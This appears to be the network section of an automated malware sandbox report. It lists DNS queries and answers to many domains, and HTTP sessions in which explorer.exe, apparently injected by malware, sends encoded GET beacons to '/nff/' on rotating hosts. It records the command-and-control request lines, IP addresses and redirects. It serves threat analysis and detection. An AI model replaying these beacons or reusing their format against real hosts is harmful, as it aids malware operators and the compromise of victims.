                                                                                Jul 19, 2021 20:22:00.214523077 CEST53619468.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:22:12.125785112 CEST6491053192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:22:12.201090097 CEST53649108.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:22:12.584615946 CEST5212353192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:22:12.644654989 CEST53521238.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:22:20.640419006 CEST5613053192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:22:21.062153101 CEST53561308.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:22:41.970782995 CEST5633853192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:22:42.032083035 CEST53563388.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:23:15.067255974 CEST5942053192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:23:15.069219112 CEST5878453192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:23:15.125947952 CEST53594208.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:23:15.129965067 CEST53587848.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:23:21.955801964 CEST6397853192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:23:22.024652004 CEST53639788.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:23:40.323507071 CEST6293853192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:23:40.762442112 CEST53629388.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:24:01.658821106 CEST5570853192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:24:01.722594023 CEST53557088.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:24:22.101960897 CEST5680353192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:24:22.335448980 CEST53568038.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:24:45.420978069 CEST5714553192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:24:45.494817019 CEST53571458.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:25:03.826634884 CEST5535953192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:25:03.890599966 CEST53553598.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:25:24.891907930 CEST5830653192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:25:24.956937075 CEST53583068.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:25:28.052916050 CEST6412453192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:25:28.129471064 CEST53641248.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:25:28.405065060 CEST4936153192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:25:28.455562115 CEST53493618.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:25:28.922749043 CEST6315053192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:25:28.975315094 CEST53631508.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:25:32.578676939 CEST5327953192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:25:32.652108908 CEST53532798.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:25:36.208703995 CEST5688153192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:25:36.259958029 CEST53568818.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:25:36.572184086 CEST5364253192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:25:36.641433001 CEST53536428.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:25:45.478404045 CEST5566753192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:25:45.539284945 CEST53556678.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:26:06.052750111 CEST5483353192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:26:06.152162075 CEST53548338.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:26:26.630918980 CEST6247653192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:26:26.704118967 CEST53624768.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:26:47.358865976 CEST4970553192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:26:47.419030905 CEST53497058.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:27:27.851659060 CEST6147753192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:27:28.061136961 CEST53614778.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:27:50.906394958 CEST6163353192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:27:51.229108095 CEST53616338.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:28:09.968969107 CEST5594953192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:28:10.031167030 CEST53559498.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:28:15.133222103 CEST5760153192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:28:15.190722942 CEST53576018.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:28:32.403052092 CEST4934253192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:28:32.473375082 CEST53493428.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:28:52.777720928 CEST5625353192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:28:52.840178013 CEST53562538.8.8.8192.168.2.3

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                Jul 19, 2021 20:22:20.640419006 CEST192.168.2.38.8.8.80x7369Standard query (0)kinmirai.orgA (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:23:21.955801964 CEST192.168.2.38.8.8.80x8ccdStandard query (0)www.creditmystartup.comA (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:23:40.323507071 CEST192.168.2.38.8.8.80x848cStandard query (0)www.oubacm.comA (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:24:01.658821106 CEST192.168.2.38.8.8.80x9745Standard query (0)www.mothererph.comA (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:24:22.101960897 CEST192.168.2.38.8.8.80x652Standard query (0)www.bloomandbrewcafe.comA (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:24:45.420978069 CEST192.168.2.38.8.8.80x4ee4Standard query (0)www.howtovvbucks.comA (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:25:03.826634884 CEST192.168.2.38.8.8.80x3d50Standard query (0)www.mikecdmusic.comA (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:25:24.891907930 CEST192.168.2.38.8.8.80x8c9eStandard query (0)www.pacleanfuel.comA (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:25:45.478404045 CEST192.168.2.38.8.8.80xe26dStandard query (0)www.foeweifgoor73dz.comA (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:26:06.052750111 CEST192.168.2.38.8.8.80x3378Standard query (0)www.thehomechef.globalA (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:26:26.630918980 CEST192.168.2.38.8.8.80xe42fStandard query (0)www.yellow-wink.comA (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:26:47.358865976 CEST192.168.2.38.8.8.80x7b81Standard query (0)www.amazonautomationbusiness.comA (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:27:27.851659060 CEST192.168.2.38.8.8.80xc066Standard query (0)www.ooweesports.comA (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:27:50.906394958 CEST192.168.2.38.8.8.80x9638Standard query (0)www.gentrypartyof8.comA (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:28:09.968969107 CEST192.168.2.38.8.8.80xa07bStandard query (0)www.dunn-labs.comA (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:28:32.403052092 CEST192.168.2.38.8.8.80xa9eaStandard query (0)www.tearor.comA (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:28:52.777720928 CEST192.168.2.38.8.8.80xaff2Standard query (0)www.creditmystartup.comA (IP address)IN (0x0001)

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                Jul 19, 2021 20:22:21.062153101 CEST8.8.8.8192.168.2.30x7369No error (0)kinmirai.org133.130.104.18A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:23:22.024652004 CEST8.8.8.8192.168.2.30x8ccdName error (3)www.creditmystartup.comnonenoneA (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:23:40.762442112 CEST8.8.8.8192.168.2.30x848cNo error (0)www.oubacm.com45.193.166.57A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:24:01.722594023 CEST8.8.8.8192.168.2.30x9745No error (0)www.mothererph.commothererph.comCNAME (Canonical name)IN (0x0001)
                                                                                Jul 19, 2021 20:24:01.722594023 CEST8.8.8.8192.168.2.30x9745No error (0)mothererph.com34.102.136.180A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:24:22.335448980 CEST8.8.8.8192.168.2.30x652No error (0)www.bloomandbrewcafe.com137gate.comCNAME (Canonical name)IN (0x0001)
                                                                                Jul 19, 2021 20:24:22.335448980 CEST8.8.8.8192.168.2.30x652No error (0)137gate.com31.44.185.28A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:24:45.494817019 CEST8.8.8.8192.168.2.30x4ee4No error (0)www.howtovvbucks.com81.17.18.196A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:25:03.890599966 CEST8.8.8.8192.168.2.30x3d50No error (0)www.mikecdmusic.commikecdmusic.comCNAME (Canonical name)IN (0x0001)
                                                                                Jul 19, 2021 20:25:03.890599966 CEST8.8.8.8192.168.2.30x3d50No error (0)mikecdmusic.com184.168.131.241A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:25:24.956937075 CEST8.8.8.8192.168.2.30x8c9eNo error (0)www.pacleanfuel.compacleanfuel.comCNAME (Canonical name)IN (0x0001)
                                                                                Jul 19, 2021 20:25:24.956937075 CEST8.8.8.8192.168.2.30x8c9eNo error (0)pacleanfuel.com35.208.122.142A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:25:28.129471064 CEST8.8.8.8192.168.2.30x14aaNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                Jul 19, 2021 20:25:45.539284945 CEST8.8.8.8192.168.2.30xe26dNo error (0)www.foeweifgoor73dz.comfoeweifgoor73dz.comCNAME (Canonical name)IN (0x0001)
                                                                                Jul 19, 2021 20:25:45.539284945 CEST8.8.8.8192.168.2.30xe26dNo error (0)foeweifgoor73dz.com34.102.136.180A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:26:06.152162075 CEST8.8.8.8192.168.2.30x3378No error (0)www.thehomechef.global198.50.252.64A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:26:26.704118967 CEST8.8.8.8192.168.2.30xe42fNo error (0)www.yellow-wink.comyellow-wink.comCNAME (Canonical name)IN (0x0001)
                                                                                Jul 19, 2021 20:26:26.704118967 CEST8.8.8.8192.168.2.30xe42fNo error (0)yellow-wink.com34.102.136.180A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:26:47.419030905 CEST8.8.8.8192.168.2.30x7b81No error (0)www.amazonautomationbusiness.com104.21.53.7A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:26:47.419030905 CEST8.8.8.8192.168.2.30x7b81No error (0)www.amazonautomationbusiness.com172.67.206.203A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:27:28.061136961 CEST8.8.8.8192.168.2.30xc066No error (0)www.ooweesports.com45.33.252.45A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:27:51.229108095 CEST8.8.8.8192.168.2.30x9638No error (0)www.gentrypartyof8.comgentrypartyof8.comCNAME (Canonical name)IN (0x0001)
                                                                                Jul 19, 2021 20:27:51.229108095 CEST8.8.8.8192.168.2.30x9638No error (0)gentrypartyof8.com66.235.200.146A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:28:10.031167030 CEST8.8.8.8192.168.2.30xa07bNo error (0)www.dunn-labs.comdunn-labs.comCNAME (Canonical name)IN (0x0001)
                                                                                Jul 19, 2021 20:28:10.031167030 CEST8.8.8.8192.168.2.30xa07bNo error (0)dunn-labs.com34.102.136.180A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:28:32.473375082 CEST8.8.8.8192.168.2.30xa9eaNo error (0)www.tearor.com212.32.237.90A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:28:52.840178013 CEST8.8.8.8192.168.2.30xaff2Name error (3)www.creditmystartup.comnonenoneA (IP address)IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • www.oubacm.com
                                                                                • www.mothererph.com
                                                                                • www.howtovvbucks.com
                                                                                • www.mikecdmusic.com
                                                                                • www.pacleanfuel.com
                                                                                • www.foeweifgoor73dz.com
                                                                                • www.thehomechef.global
                                                                                • www.yellow-wink.com
                                                                                • www.amazonautomationbusiness.com
                                                                                • www.ooweesports.com
                                                                                • www.gentrypartyof8.com
                                                                                • www.dunn-labs.com
                                                                                • www.tearor.com

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.34975045.193.166.5780C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jul 19, 2021 20:23:41.118997097 CEST6161OUTGET /nff/?D48p=kOxlMsEjtzqi35JKXOQvqY0Z9Dr8MJKVGpcl7uHZUSc/duxdP9tVlajaQyGMVspbd71z&-ZgX=tR-DSFa8o HTTP/1.1
                                                                                Host: www.oubacm.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Jul 19, 2021 20:23:41.469955921 CEST6161INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 19 Jul 2021 18:23:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                1192.168.2.34975134.102.136.18080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jul 19, 2021 20:24:01.766391039 CEST6162OUTGET /nff/?-ZgX=tR-DSFa8o&D48p=1Xxx+qd8pBTLA+WTXKo7XaXaUaa/vtHv40sNd0BzbA6K7Qnc9Dw7+srX/AipaLaYNVgg HTTP/1.1
                                                                                Host: www.mothererph.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Jul 19, 2021 20:24:01.904855967 CEST6163INHTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Mon, 19 Jul 2021 18:24:01 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "60ef679d-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                10192.168.2.34976766.235.200.14680C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jul 19, 2021 20:27:51.274418116 CEST6319OUTGET /nff/?D48p=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8Ikvp/Bi1Hxc&-ZgX=tR-DSFa8o HTTP/1.1
                                                                                Host: www.gentrypartyof8.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                11192.168.2.34976834.102.136.18080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jul 19, 2021 20:28:10.074420929 CEST6320OUTGET /nff/?-ZgX=tR-DSFa8o&D48p=23vdk0INmHdYoMyjDJpAXxw5aErMVqufSgZPm4X7AcKozm0yVvV2ivtCtqAjwFsJpdV9 HTTP/1.1
                                                                                Host: www.dunn-labs.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Jul 19, 2021 20:28:10.212614059 CEST6321INHTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Mon, 19 Jul 2021 18:28:10 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "60ef67ac-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                12192.168.2.349770212.32.237.9080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jul 19, 2021 20:28:32.524736881 CEST6330OUTGET /nff/?D48p=4F7AytNRxG9Okht4XRBjCmtmhOo761MGK9UHRz2K68ko8sG2VRn93GfHKNzVTrlp6vls&-ZgX=tR-DSFa8o HTTP/1.1
                                                                                Host: www.tearor.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Jul 19, 2021 20:28:32.593398094 CEST6330INHTTP/1.1 302 Found
                                                                                cache-control: max-age=0, private, must-revalidate
                                                                                connection: close
                                                                                content-length: 11
                                                                                date: Mon, 19 Jul 2021 18:28:31 GMT
                                                                                location: http://survey-smiles.com
                                                                                server: nginx
                                                                                set-cookie: sid=1f40a452-e8bf-11eb-b30c-7ad82c50a0ff; path=/; domain=.tearor.com; expires=Sat, 06 Aug 2089 21:42:39 GMT; max-age=2147483647; HttpOnly
                                                                                Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                Data Ascii: Redirecting


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                2192.168.2.34975381.17.18.19680C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jul 19, 2021 20:24:45.537377119 CEST6164OUTGET /nff/?-ZgX=tR-DSFa8o&D48p=t6POCtyEK9WeI3wHMDqVXFf1P6NZVFBUQrx3hzUMeWhQO7zB8dJJWUZafBhAs6NE8fvj HTTP/1.1
                                                                                Host: www.howtovvbucks.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Jul 19, 2021 20:24:45.641721010 CEST6165INHTTP/1.1 302 Found
                                                                                cache-control: max-age=0, private, must-revalidate
                                                                                connection: close
                                                                                content-length: 11
                                                                                date: Mon, 19 Jul 2021 18:24:44 GMT
                                                                                location: http://survey-smiles.com
                                                                                server: nginx
                                                                                set-cookie: sid=97f43c84-e8be-11eb-b907-b5ecbe7de670; path=/; domain=.howtovvbucks.com; expires=Sat, 06 Aug 2089 21:38:52 GMT; max-age=2147483647; HttpOnly
                                                                                Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                Data Ascii: Redirecting


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                3192.168.2.349754184.168.131.24180C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jul 19, 2021 20:25:04.092866898 CEST6166OUTGET /nff/?D48p=A3r1GoCxq8luIa6nCE3Ske6N+BTFMgq1N1qJ/FMsH45BCQO39yS3uoKBERul6QoZrrZt&-ZgX=tR-DSFa8o HTTP/1.1
                                                                                Host: www.mikecdmusic.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Jul 19, 2021 20:25:04.370007992 CEST6166INHTTP/1.1 301 Moved Permanently
                                                                                Server: nginx/1.16.1
                                                                                Date: Mon, 19 Jul 2021 18:25:04 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Location: http://www.teacherspayteachers.com/Store/Mike-Collins-dowden-Composer?D48p=A3r1GoCxq8luIa6nCE3Ske6N+BTFMgq1N1qJ/FMsH45BCQO39yS3uoKBERul6QoZrrZt&-ZgX=tR-DSFa8o
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                4192.168.2.34975535.208.122.14280C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jul 19, 2021 20:25:25.115896940 CEST6167OUTGET /nff/?-ZgX=tR-DSFa8o&D48p=hj2zxdGwTxg/Oy5I2ijyN0fTICzPxcwPRfXb7vTf2tNSz2x0IcDR494UQaPw8xmFi6Rl HTTP/1.1
                                                                                Host: www.pacleanfuel.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Jul 19, 2021 20:25:25.272996902 CEST6168INHTTP/1.1 301 Moved Permanently
                                                                                Server: nginx
                                                                                Date: Mon, 19 Jul 2021 18:25:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 162
                                                                                Connection: close
                                                                                Location: https://www.pacleanfuel.com/nff/?-ZgX=tR-DSFa8o&D48p=hj2zxdGwTxg/Oy5I2ijyN0fTICzPxcwPRfXb7vTf2tNSz2x0IcDR494UQaPw8xmFi6Rl
                                                                                Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                X-HTTPS-Enforce: 1
                                                                                X-Proxy-Cache-Info: DT:1
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                5192.168.2.34976234.102.136.18080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jul 19, 2021 20:25:45.584847927 CEST6301OUTGET /nff/?D48p=yLp+OGFnl0jg7pOzvTf//aMS5CTocG0VRGMnH1GHhYzZCkZUh0GgSDI2xq5DNsTFnZjT&-ZgX=tR-DSFa8o HTTP/1.1
                                                                                Host: www.foeweifgoor73dz.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Jul 19, 2021 20:25:45.722975016 CEST6302INHTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Mon, 19 Jul 2021 18:25:45 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "60ef6775-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                6192.168.2.349763198.50.252.6480C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jul 19, 2021 20:26:06.282283068 CEST6303OUTGET /nff/?-ZgX=tR-DSFa8o&D48p=27rvRn0KmepyxD8tf0kCiU4ghUW26GTZLquNc10L5JocjkBpiI2ubcvHzFDqc++aW5sB HTTP/1.1
                                                                                Host: www.thehomechef.global
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Jul 19, 2021 20:26:06.413971901 CEST6304INHTTP/1.1 200 OK
                                                                                Date: Mon, 19 Jul 2021 18:26:06 GMT
                                                                                Server: Apache
                                                                                Cache-Control: no-cache, must-revalidate
                                                                                Connection: close
                                                                                Transfer-Encoding: chunked
                                                                                Content-Type: text/html; charset=UTF-8
